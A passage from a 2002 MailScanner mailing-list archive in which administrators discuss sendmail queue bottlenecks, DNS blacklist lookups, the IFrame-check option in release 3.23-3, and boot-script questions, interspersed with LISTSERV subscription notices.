to improve my performance? If I go into /var/spool/mqueue.in I get this: root@xxx:/var/spool/mqueue.in# ls | wc -l 342 I'm running MailScanner 3.20-4 and SpamAssassin 2.20 (I think!), and if it matters the POP3 daemon I'm using is cucipop. Loads on the machine are generally pretty low, around 0.05-0.10, though it's been as high as 0.40 today. We're scanning the emails with Sophos 3.57. Oh, I should say we're using Sendmail too (8.11.2). Here are some lines from my MailScanner config, let me know if you want to see more: Delivery Method = batch Deliver In Background = yes Judging from this page (http://www.sng.ecs.soton.ac.uk/mailscanner/faq.shtml) I should try setting Delivery Method to "queue". Our DNS is fine, though. Any ideas? Here's how I'm starting my Sendmail: echo "Starting sendmail daemon (/usr/sbin/sendmail -bd -ODeliveryMode=queueonly \ -OQueueDirectory=/var/spool/mqueue.in)..." /usr/sbin/sendmail -bd -ODeliveryMode=queueonly -OQueueDirectory=/var/spool/mqueue.in echo "Starting sendmail daemon (/usr/sbin/sendmail -bd -q5m)..." /usr/sbin/sendmail -q5m thanks guys, Chris -- Chris Waltham Systems Administrator HarvestRoad, Limited. chris@harvestroad.com phone: (08) 9338-3000 From mailscanner-news at WIJDOGEN.DHS.ORG Wed Sep 25 15:18:25 2002 From: mailscanner-news at WIJDOGEN.DHS.ORG (Jeroen) Date: Thu Jan 12 21:15:46 2006 Subject: ANNOUNCE: Version 3.23-3 released References: <5.1.0.14.2.20020925113745.033c1980@imap.ecs.soton.ac.uk> Message-ID: <013f01c2649e$699cf6a0$0101a8c0@jeroen> Hello, > Just 1 minor bug fix. Doesn't affect actual functionality, but stops the > mail log swearing like a trooper. And yes, it really does fix the bug, not > just change the log message... should this fix the: >> > > >One thing I am wondering with, why does this eicar.com gfi test email goes >> > > >to my outlook express deleted items with a modified subject {VIRUS?} >> > > >eicar.com [1/5] up to [5/5] and theres no warning message in the body and >> > > >the attachment is intact with the filename eicar.com. im just wondering >> > > >about this. The "shit" message is gone but the 'eicar.com' is still splitted. If you need the output from my logfile let me know, i would mail it to you personal. (to hide my addresses for searchengines, i dont wan't to edit the whole log part) Regards, Jeroen From hciss at HCIWS.COM Wed Sep 25 15:33:30 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:46 2006 Subject: [Mailscanner] SpamCop IP's References: <00ae01c26427$d1ca6680$6701a8c0@matthew> <5.1.0.14.2.20020925104637.033fbed8@imap.ecs.soton.ac.uk> Message-ID: <003101c264a0$87b00540$6701a8c0@matthew> > Most of this has migrated into a discussion about DNS server setups. I > would advise use of a local caching DNS server as this will increase the > speed of repeated lookups considerably. The DNS system already has positive > and negative result cache timeouts in it, and if you aren't caching Thats right, there are TTL settings and stuff, forgot. I just never realized that blackhole lookups used one's own DNS servers to do the lookup and did not always go directly to the blackhole. I have a caching DNS server sitting right next to my Raq4i. I guess I should use it for the Raq as well as my Internet users. > yourself, then the next DNS server upstream from you will be caching > anyway. So you might as well do it on your own net and speed things up. > > For the reasons highlighted before (e.g. use of the DUL list, which is a > list of all known IP addresses allocated to dialup lines around the world), > MailScanner only uses the last hop. Anything before the last hop can be > trivially faked, so there's absolutely no point wasting CPU on extracting Fake IP's can be added to the headers but there is no way to keep your own out of it that I know of. Unless you own the server and if you do that it should be black listed anyway. I still think doing the last 2 hops would be a great option. Think if a DSL user from a large Dsl provider for example were to send a bunch of SPAM using mail.dsl-provider.com. Since SPAMcop looks at legitimate mail to SPAM ratio(I think) it would be a long while before mail.dsl-provider.com would be listed but the end users IP would be listed quite quickly. Sure the Dsl provider should terminate the users account but that takes time and by that time many pieces of SPAM have been pumped out. I guess what it comes down too is checking the last couple hops would catch a lot more spam with SPAMCOP. I am pretty sure of that after looking at some messages that slipped through. It would likely not do much more good if any with Ordb.org or other balck lists though. Thanks for the info. Matthew > the IP addresses from the headers and testing them. Any professional > spammer will fake them anyway. > > At 01:28 25/09/2002, you wrote: > >True, if the lookup has not been cached, it would go to the server > >authoritative for the zone. You should be able to control the > >length of time the cache is valid for though. For the most part, I have > >added entries to my /etc/mail/access file to allow servers > >that I know have been blacklisted, but for one reason or another, I must > >allow mail to flow from. On a very rare occasion, I have > >to add an entry, but it's on the order of once a month or less. From mike at CAMAROSS.NET Wed Sep 25 15:51:27 2002 From: mike at CAMAROSS.NET (Mike Kercher) Date: Thu Jan 12 21:15:46 2006 Subject: [Mailscanner] SpamCop IP's In-Reply-To: <003101c264a0$87b00540$6701a8c0@matthew> Message-ID: Nothing is going to stop the flow of spam completely. Sure, it will take some time for servers to be added to or removed from blacklists, but it sure does help slow down that flow! I block literally thousands of connections per day based on these blacklists. Again, occasionally I have to allow a server through, but I'd much rather do that than be harassed by the onslaught of crap that gets sent each day. Mike -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Matt Sent: Wednesday, September 25, 2002 9:34 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: [Mailscanner] SpamCop IP's > Most of this has migrated into a discussion about DNS server setups. I > would advise use of a local caching DNS server as this will increase the > speed of repeated lookups considerably. The DNS system already has positive > and negative result cache timeouts in it, and if you aren't caching Thats right, there are TTL settings and stuff, forgot. I just never realized that blackhole lookups used one's own DNS servers to do the lookup and did not always go directly to the blackhole. I have a caching DNS server sitting right next to my Raq4i. I guess I should use it for the Raq as well as my Internet users. > yourself, then the next DNS server upstream from you will be caching > anyway. So you might as well do it on your own net and speed things up. > > For the reasons highlighted before (e.g. use of the DUL list, which is a > list of all known IP addresses allocated to dialup lines around the world), > MailScanner only uses the last hop. Anything before the last hop can be > trivially faked, so there's absolutely no point wasting CPU on extracting Fake IP's can be added to the headers but there is no way to keep your own out of it that I know of. Unless you own the server and if you do that it should be black listed anyway. I still think doing the last 2 hops would be a great option. Think if a DSL user from a large Dsl provider for example were to send a bunch of SPAM using mail.dsl-provider.com. Since SPAMcop looks at legitimate mail to SPAM ratio(I think) it would be a long while before mail.dsl-provider.com would be listed but the end users IP would be listed quite quickly. Sure the Dsl provider should terminate the users account but that takes time and by that time many pieces of SPAM have been pumped out. I guess what it comes down too is checking the last couple hops would catch a lot more spam with SPAMCOP. I am pretty sure of that after looking at some messages that slipped through. It would likely not do much more good if any with Ordb.org or other balck lists though. Thanks for the info. Matthew > the IP addresses from the headers and testing them. Any professional > spammer will fake them anyway. > > At 01:28 25/09/2002, you wrote: > >True, if the lookup has not been cached, it would go to the server > >authoritative for the zone. You should be able to control the > >length of time the cache is valid for though. For the most part, I have > >added entries to my /etc/mail/access file to allow servers > >that I know have been blacklisted, but for one reason or another, I must > >allow mail to flow from. On a very rare occasion, I have > >to add an entry, but it's on the order of once a month or less. From munafo at PREZZEMOLO.POLITO.IT Wed Sep 25 15:43:37 2002 From: munafo at PREZZEMOLO.POLITO.IT (Maurizio Matteo Munafo') Date: Thu Jan 12 21:15:46 2006 Subject: ANNOUNCE: Version 3.23-3 released In-Reply-To: <5.1.0.14.2.20020925113745.033c1980@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020925113745.033c1980@imap.ecs.soton.ac.uk> Message-ID: <0209251643370H.25518@prezzemolo.polito.it> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Wednesday 25 September 2002 12:40, Julian Field wrote: > I have just released 3.23-3. > > As the HTML IFrame tag check is causing some problems on HTML mailing > lists, I have added a configuration option to switch this check on and off. > If it is causing trouble, set > Allow IFrame Tags = yes > > I have also just released 4.00.0a6 which incorporates the same switch. > However, as the switch can be the filename of a ruleset, you can control > exactly which addresses you trust to generate IFrame tags. This means that > you can just allow them from known HTML mailing lists and ban them from > everywhere else. Nice addiction. Upgrade done (twice in one day, wow! ;-) One more question. In 4.00, will virus infected Iframe messages be clearly identified as both (reporting the name of the infecting virus in the message to the user and the fact of being affected by a 'Microsoft security attack')? Just because, at the moment, the Microsoft check completely hide the virus infection and this can let users inquire the Postmaster about actually junk virus messages. Thanks. Maurizio - -- ______ / Maurizio M. Munafo' / dMMMMMMMMb dMMMMb / Dip. di Elettronica - Politecnico di Torino / dMP"dMP"dMP "dMP / Corso Duca degli Abruzzi 24 / dMP dMP dMP dMMK" / I-10129 Torino (Italia) / dMP dMP dMP dMF / Tel: +39 011 5644128 Fax: +39 011 5644099 / dMP dMP dMP dMMMMP" / E-mail: munafo@polito.it /__________________________ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE9kcuZtgCCNnfQWWkRAgfwAJsEAI7haFE0QpI8TWoOI6fO5gJXDQCfVKHa qadDuSF4xIExuomWBg7FngE= =WYgl -----END PGP SIGNATURE----- From hciss at HCIWS.COM Wed Sep 25 17:38:30 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:46 2006 Subject: [Mailscanner] SpamCop IP's References: Message-ID: <00e001c264b2$0105aa60$6701a8c0@matthew> > Is bl.spamcop the only blacklist you use? If so, you might want to add some more...I think I'm What ones do you use? Matt From LISTSERV at JISCMAIL.AC.UK Wed Sep 25 15:59:53 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:46 2006 Subject: MAILSCANNER: deepak@EMAILINDIA.COM requested to join Message-ID: <200209251459.PAA08641@magpie.ecs.soton.ac.uk> Wed, 25 Sep 2002 15:59:53 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Deepak Kaushal . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER deepak@EMAILINDIA.COM Deepak Kaushal The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+deepak%40EMAILINDIA.COM+Deepak++++Kaushal&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From LISTSERV at JISCMAIL.AC.UK Wed Sep 25 16:25:23 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:46 2006 Subject: MAILSCANNER: raunn@VOLTERRA.COM left the list Message-ID: <200209251525.QAA12502@magpie.ecs.soton.ac.uk> Wed, 25 Sep 2002 16:25:23 Raun Nohavitza has just signed off the MAILSCANNER list (MailScanner mailing list). ------------------------- Original mail header -------------------------- [WWW request received from 209.101.17.50] From LISTSERV at JISCMAIL.AC.UK Wed Sep 25 17:39:30 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:46 2006 Subject: MAILSCANNER: djohnson@TELICA.COM requested to join Message-ID: <200209251639.RAA22838@magpie.ecs.soton.ac.uk> Wed, 25 Sep 2002 17:39:30 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Donna J . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER djohnson@TELICA.COM Donna J The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+djohnson%40TELICA.COM+Donna+J&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From LISTSERV at JISCMAIL.AC.UK Wed Sep 25 18:08:44 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:46 2006 Subject: MAILSCANNER: David.While@UCE.AC.UK requested to join Message-ID: <200209251708.SAA26545@magpie.ecs.soton.ac.uk> Wed, 25 Sep 2002 18:08:44 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from David While . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER David.While@UCE.AC.UK David While The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+David.While%40UCE.AC.UK+David+While&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From mailscanner at ecs.soton.ac.uk Wed Sep 25 18:39:51 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:46 2006 Subject: ANNOUNCE: Version 3.23-3 released In-Reply-To: <013f01c2649e$699cf6a0$0101a8c0@jeroen> References: <5.1.0.14.2.20020925113745.033c1980@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020925183659.06287e30@imap.ecs.soton.ac.uk> At 15:18 25/09/2002, you wrote: >Hello, > > > Just 1 minor bug fix. Doesn't affect actual functionality, but stops the > > mail log swearing like a trooper. And yes, it really does fix the bug, not > > just change the log message... > >should this fix the: > > >> > > >One thing I am wondering with, why does this eicar.com gfi test >email goes > >> > > >to my outlook express deleted items with a modified subject {VIRUS?} > >> > > >eicar.com [1/5] up to [5/5] and theres no warning message in the >body and > >> > > >the attachment is intact with the filename eicar.com. im just >wondering > >> > > >about this. Unfortunately, it appears that the MIME-tools modules don't cope with message/partial very well, even with the 2nd patch applied. When I create a new top-level MIME entity to replace the message/partial structure, it doesn't realise it needs to merge this into the new headers. The result is that the resulting message isn't very tidy. However, I have checked the raw contents of the 5 messages produced by it, and none of them actually contain any data from the original attachment. Quite what Outlook Express makes of it, I haven't been able to try yet (I've spent my afternoon up to my neck in 6ft racks, RAID arrays and SGI fileservers). -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Wed Sep 25 18:22:25 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:46 2006 Subject: ANNOUNCE: Version 3.23-3 released In-Reply-To: <0209251643370H.25518@prezzemolo.polito.it> References: <5.1.0.14.2.20020925113745.033c1980@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020925113745.033c1980@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020925182027.04882658@imap.ecs.soton.ac.uk> At 15:43 25/09/2002, you wrote: >One more question. In 4.00, will virus infected Iframe messages be clearly >identified as both (reporting the name of the infecting virus in the message >to the user and the fact of being affected by a 'Microsoft security attack')? Yes. >Just because, at the moment, the Microsoft check completely hide the virus >infection and this can let users inquire the Postmaster about actually junk >virus messages. Indeed, the V3 code isn't the ideal solution, but I'm trying to ramp down the amount of work I do on the V3 code so I can concentrate on getting V4 going well. In V3 it's a pain (the way the code is now) to get the attachment name out that's got the IFrame in it (just a fact of the way I wrote it). I'm not saying it's impossible, just that I'm reluctant to spend too much time on it. Hope you understand. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mike at CAMAROSS.NET Wed Sep 25 18:57:05 2002 From: mike at CAMAROSS.NET (Mike Kercher) Date: Thu Jan 12 21:15:46 2006 Subject: ANNOUNCE: Version 3.23-3 released In-Reply-To: <5.1.0.14.2.20020925183659.06287e30@imap.ecs.soton.ac.uk> Message-ID: "(I've spent my afternoon up to my neck in 6ft racks, RAID arrays and SGI fileservers)." Wow! You must be tall! :) -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Julian Field Sent: Wednesday, September 25, 2002 12:40 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: ANNOUNCE: Version 3.23-3 released At 15:18 25/09/2002, you wrote: >Hello, > > > Just 1 minor bug fix. Doesn't affect actual functionality, but stops the > > mail log swearing like a trooper. And yes, it really does fix the bug, not > > just change the log message... > >should this fix the: > > >> > > >One thing I am wondering with, why does this eicar.com gfi test >email goes > >> > > >to my outlook express deleted items with a modified subject {VIRUS?} > >> > > >eicar.com [1/5] up to [5/5] and theres no warning message in the >body and > >> > > >the attachment is intact with the filename eicar.com. im just >wondering > >> > > >about this. Unfortunately, it appears that the MIME-tools modules don't cope with message/partial very well, even with the 2nd patch applied. When I create a new top-level MIME entity to replace the message/partial structure, it doesn't realise it needs to merge this into the new headers. The result is that the resulting message isn't very tidy. However, I have checked the raw contents of the 5 messages produced by it, and none of them actually contain any data from the original attachment. Quite what Outlook Express makes of it, I haven't been able to try yet (I've spent my afternoon up to my neck in 6ft racks, RAID arrays and SGI fileservers). -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From munafo at PREZZEMOLO.POLITO.IT Wed Sep 25 18:55:32 2002 From: munafo at PREZZEMOLO.POLITO.IT (Maurizio Matteo Munafo') Date: Thu Jan 12 21:15:46 2006 Subject: ANNOUNCE: Version 3.23-3 released In-Reply-To: <5.1.0.14.2.20020925182027.04882658@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020925113745.033c1980@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020925182027.04882658@imap.ecs.soton.ac.uk> Message-ID: <0209251955320J.25518@prezzemolo.polito.it> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Wednesday 25 September 2002 19:22, Julian Field wrote: > At 15:43 25/09/2002, you wrote: > >One more question. In 4.00, will virus infected Iframe messages be clearly > >identified as both (reporting the name of the infecting virus in the > > message to the user and the fact of being affected by a 'Microsoft > > security attack')? > > Yes. > > >Just because, at the moment, the Microsoft check completely hide the virus > >infection and this can let users inquire the Postmaster about actually > > junk virus messages. > > Indeed, the V3 code isn't the ideal solution, but I'm trying to ramp down > the amount of work I do on the V3 code so I can concentrate on getting V4 > going well. > > In V3 it's a pain (the way the code is now) to get the attachment name out > that's got the IFrame in it (just a fact of the way I wrote it). I'm not > saying it's impossible, just that I'm reluctant to spend too much time on > it. Hope you understand. Certainly. In fact I asked about 4.00. At the moment I just disabled the Iframe checking, but in the new version, when I can selectively enable the mailing lists, I will certainly block any uncontrolled Iframe message. Regards, Maurizio - -- ______ / Maurizio M. Munafo' / dMMMMMMMMb dMMMMb / Dip. di Elettronica - Politecnico di Torino / dMP"dMP"dMP "dMP / Corso Duca degli Abruzzi 24 / dMP dMP dMP dMMK" / I-10129 Torino (Italia) / dMP dMP dMP dMF / Tel: +39 011 5644128 Fax: +39 011 5644099 / dMP dMP dMP dMMMMP" / E-mail: munafo@polito.it /__________________________ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE9kfiVtgCCNnfQWWkRAo/4AKDuJifDWWIjYzvggbOXSS8V1FjFsACgmlQU 0PCBfRovUURRpCDADDgwqsI= =WzJ/ -----END PGP SIGNATURE----- From rvitoria at CI.UCP.PT Wed Sep 25 19:33:10 2002 From: rvitoria at CI.UCP.PT (Rui Vit=?ISO-8859-1?Q?=F3ria?=) Date: Thu Jan 12 21:15:46 2006 Subject: bootscript Message-ID: <200209251833.g8PIXAr21522@ori.rl.ac.uk> hi I changed my /var/run/sendmail.pid for "/usr/lib/sendmail -bd -q5m" and restart the mailscanner, but nothing. what can i do for change this rgdrs From LISTSERV at JISCMAIL.AC.UK Wed Sep 25 18:59:59 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:46 2006 Subject: MAILSCANNER: mrl@GENSTEAM.COM left the list Message-ID: <200209251759.SAA02196@magpie.ecs.soton.ac.uk> Wed, 25 Sep 2002 18:59:59 "Mary R. Lynch" has just signed off the MAILSCANNER list (MailScanner mailing list). ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From LISTSERV at JISCMAIL.AC.UK Wed Sep 25 19:18:37 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:46 2006 Subject: MAILSCANNER: jjohanns@SEWANEE.EDU requested to join Message-ID: <200209251818.TAA03852@magpie.ecs.soton.ac.uk> Wed, 25 Sep 2002 19:18:37 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Johannes Johannsson . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER jjohanns@SEWANEE.EDU Johannes Johannsson The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+jjohanns%40SEWANEE.EDU+Johannes+Johannsson&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From LISTSERV at JISCMAIL.AC.UK Wed Sep 25 19:41:56 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:46 2006 Subject: MAILSCANNER: garyp@COAM.NET requested to join Message-ID: <200209251841.TAA06083@magpie.ecs.soton.ac.uk> Wed, 25 Sep 2002 19:41:56 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Gary P . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER garyp@COAM.NET Gary P The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+garyp%40COAM.NET+Gary+P&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From LISTSERV at JISCMAIL.AC.UK Wed Sep 25 19:49:03 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:46 2006 Subject: MAILSCANNER: combslm@APPSTATE.EDU requested to join Message-ID: <200209251849.TAA06729@magpie.ecs.soton.ac.uk> Wed, 25 Sep 2002 19:49:03 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Laramie Combs . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER combslm@APPSTATE.EDU Laramie Combs The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+combslm%40APPSTATE.EDU+Laramie+Combs&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From mkettler at EVI-INC.COM Wed Sep 25 21:12:36 2002 From: mkettler at EVI-INC.COM (Matt Kettler) Date: Thu Jan 12 21:15:46 2006 Subject: bootscript In-Reply-To: <200209251833.g8PIXAr21522@ori.rl.ac.uk> Message-ID: <5.1.1.6.0.20020925160210.0180dce8@192.168.50.2> You probably don't ever want to modify the contents of any files in /var/run yourself, except perhaps to delete a whole file (ie: if you manually kill sendmail and the .pid file is still laying around it's safe to delete it, although not necessary). The files in /var/run should be created when sendmail is started, and deleted when sendmail is stopped. They are NOT used to start sendmail in the first place, the command line is just in there for reference. The only part that is actually used is the PID on the first line, and that's used so that when sendmail is stopped/restarted the scripts know what PID to kill. Perhaps you want to edit a file /etc/rc.d/init.d instead? Those are actually used to start services. You also didn't specify what *nix platform you are running. RedHat Linux? Solaris? FreeBSD? all have slightly different boot-script behaviors. At 07:33 PM 9/25/2002 +0100, Rui Vit?ria wrote: >hi > >I changed my /var/run/sendmail.pid for "/usr/lib/sendmail -bd -q5m" and >restart the mailscanner, but nothing. > >what can i do for change this > >rgdrs From mailscanner at ecs.soton.ac.uk Wed Sep 25 21:34:14 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:46 2006 Subject: ANNOUNCE: Version 3.23-3 released In-Reply-To: References: <5.1.0.14.2.20020925183659.06287e30@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020925213353.02498a48@imap.ecs.soton.ac.uk> At 18:57 25/09/2002, you wrote: >"(I've spent my afternoon up to my neck in 6ft racks, RAID arrays and SGI >fileservers)." > >Wow! You must be tall! :) Leap over tall buildings in a single bound, me :) >-----Original Message----- >From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On >Behalf Of Julian Field >Sent: Wednesday, September 25, 2002 12:40 PM >To: MAILSCANNER@JISCMAIL.AC.UK >Subject: Re: ANNOUNCE: Version 3.23-3 released > > >At 15:18 25/09/2002, you wrote: > >Hello, > > > > > Just 1 minor bug fix. Doesn't affect actual functionality, but stops the > > > mail log swearing like a trooper. And yes, it really does fix the > bug, not > > > just change the log message... > > > >should this fix the: > > > > >> > > >One thing I am wondering with, why does this eicar.com gfi test > >email goes > > >> > > >to my outlook express deleted items with a modified subject > {VIRUS?} > > >> > > >eicar.com [1/5] up to [5/5] and theres no warning message in the > >body and > > >> > > >the attachment is intact with the filename eicar.com. im just > >wondering > > >> > > >about this. > >Unfortunately, it appears that the MIME-tools modules don't cope with >message/partial very well, even with the 2nd patch applied. When I create a >new top-level MIME entity to replace the message/partial structure, it >doesn't realise it needs to merge this into the new headers. The result is >that the resulting message isn't very tidy. However, I have checked the raw >contents of the 5 messages produced by it, and none of them actually >contain any data from the original attachment. Quite what Outlook Express >makes of it, I haven't been able to try yet (I've spent my afternoon up to >my neck in 6ft racks, RAID arrays and SGI fileservers). >-- >Julian Field Teaching Systems Manager >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science >Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Wed Sep 25 21:35:48 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:46 2006 Subject: bootscript In-Reply-To: <200209251833.g8PIXAr21522@ori.rl.ac.uk> Message-ID: <5.1.0.14.2.20020925213513.02506bf0@imap.ecs.soton.ac.uk> I would politely suggest that you buy a decent book on Unix / Linux system administration. At 19:33 25/09/2002, you wrote: >hi > >I changed my /var/run/sendmail.pid for "/usr/lib/sendmail -bd -q5m" and >restart the mailscanner, but nothing. > >what can i do for change this > >rgdrs -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From tyler at BELOIT.EDU Wed Sep 25 22:13:49 2002 From: tyler at BELOIT.EDU (Tim Tyler) Date: Thu Jan 12 21:15:46 2006 Subject: bottlenecking? Message-ID: <5.1.1.6.0.20020925155955.02077ea8@beloit.edu> Mailscanner experts, We are currently running mailscanner 2.6 on AIX4.3.3 systems. Occassionally, we have noticed that mailscanner clogs up at peak periods and can't seem to process email for hours. This means that local or remote mail is stuck in /var/spool/mqueue.in for hours before eventually making it to the normal sendmail mqueue (if at all). If I kill the mailscanner process and restart it everything gets processed nearly immediately. Isn't mailscanner_check running in crontab supposed to make sure that the process is running ok? It would really be better if it simply killed the existing process every time and restarted it. I suggest this because if it thinks the process is running ok when it isn't, then its useless. Anyone's thoughts about killing and restarting the process every 20 minutes or so? Are there any other suggestions for configurations that can minimize bottlenecking? Tim Tim Tyler Network Engineer - Beloit College tyler@beloit.edu From mike at CAMAROSS.NET Wed Sep 25 22:41:54 2002 From: mike at CAMAROSS.NET (Mike Kercher) Date: Thu Jan 12 21:15:46 2006 Subject: bottlenecking? In-Reply-To: <5.1.1.6.0.20020925155955.02077ea8@beloit.edu> Message-ID: Why not upgrade to 3.23-3 and see if that helps? -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Tim Tyler Sent: Wednesday, September 25, 2002 4:14 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: bottlenecking? Mailscanner experts, We are currently running mailscanner 2.6 on AIX4.3.3 systems. Occassionally, we have noticed that mailscanner clogs up at peak periods and can't seem to process email for hours. This means that local or remote mail is stuck in /var/spool/mqueue.in for hours before eventually making it to the normal sendmail mqueue (if at all). If I kill the mailscanner process and restart it everything gets processed nearly immediately. Isn't mailscanner_check running in crontab supposed to make sure that the process is running ok? It would really be better if it simply killed the existing process every time and restarted it. I suggest this because if it thinks the process is running ok when it isn't, then its useless. Anyone's thoughts about killing and restarting the process every 20 minutes or so? Are there any other suggestions for configurations that can minimize bottlenecking? Tim Tim Tyler Network Engineer - Beloit College tyler@beloit.edu From mailscanner at ecs.soton.ac.uk Wed Sep 25 23:48:50 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:46 2006 Subject: bottlenecking? In-Reply-To: <5.1.1.6.0.20020925155955.02077ea8@beloit.edu> References: <5.1.1.6.0.20020925155955.02077ea8@beloit.edu> Message-ID: <1032994130.3d923d52c77b2@secure.ecs.soton.ac.uk> Quoting Tim Tyler : > Mailscanner experts, > We are currently running mailscanner 2.6 on AIX4.3.3 > systems. Occassionally, we have noticed that mailscanner clogs up at > peak > periods and can't seem to process email for hours. This means that local > or remote mail is stuck in /var/spool/mqueue.in for hours before > eventually > making it to the normal sendmail mqueue (if at all). If I kill the > mailscanner process and restart it everything gets processed nearly > immediately. > > Isn't mailscanner_check running in crontab supposed to make sure that > the > process is running ok? It would really be better if it simply killed the > existing process every time and restarted it. I suggest this because if > it > thinks the process is running ok when it isn't, then its useless. > Anyone's > thoughts about killing and restarting the process every 20 minutes or so? > > Are there any other suggestions for configurations that can minimize > bottlenecking? Not sure why you are hitting the problem. However, what you could do is set the "Restart Every" interval much shorter. Then MailScanner will re-exec itself more frequently, which will probably work around whatever the underlying problem is. "Restart Every = 1200" would make it restart every 20 minutes. -- Jules From hciss at HCIWS.COM Thu Sep 26 00:01:11 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:46 2006 Subject: mailscanner restart Message-ID: <008501c264e7$73e67020$6701a8c0@matthew> Just wandering, is this a 